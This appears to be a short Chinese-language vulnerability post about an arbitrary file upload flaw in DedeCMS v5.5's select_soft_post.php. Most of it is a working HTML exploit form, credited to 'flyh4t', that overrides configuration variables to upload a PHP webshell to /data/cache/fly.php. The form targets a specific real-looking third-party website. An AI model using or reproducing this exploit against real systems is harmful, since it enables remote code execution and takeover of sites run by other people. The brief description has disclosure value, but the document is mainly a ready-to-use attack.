漏洞版本:
漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。
测试方法:
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<bodystyle="FONT-SIZE:9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br/><br/>
<formaction=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.phpmethod='POST'enctype="multipart/form-data"name='myform'>
<inputtype='hidden'name='activepath'value='/data/cache/'/>
<inputtype='hidden'name='cfg_basedir'value='../../'/>
<inputtype='hidden'name='cfg_imgtype'value='php'/>
<inputtype='hidden'name='cfg_not_allowall'value='txt'/>
<inputtype='hidden'name='cfg_softtype'value='php'/>
<inputtype='hidden'name='cfg_mediatype'value='php'/>
<inputtype='hidden'name='f'value='form1.enclosure'/>
<inputtype='hidden'name='job'value='upload'/>
<inputtype='hidden'name='newname'value='fly.php'/>
Select U Shell <inputtype='file'name='uploadfile'size='25'/>
<inputtype='submit'name='sb1'value='确定'/>
</form>
<br/>It's just a exp for the bug of Dedecms V55...<br/>
Need register_globals = on...<br/>
Fun the game,get a webshell at /data/cache/fly.php...<br/>
</body>
</html>
|
请发表评论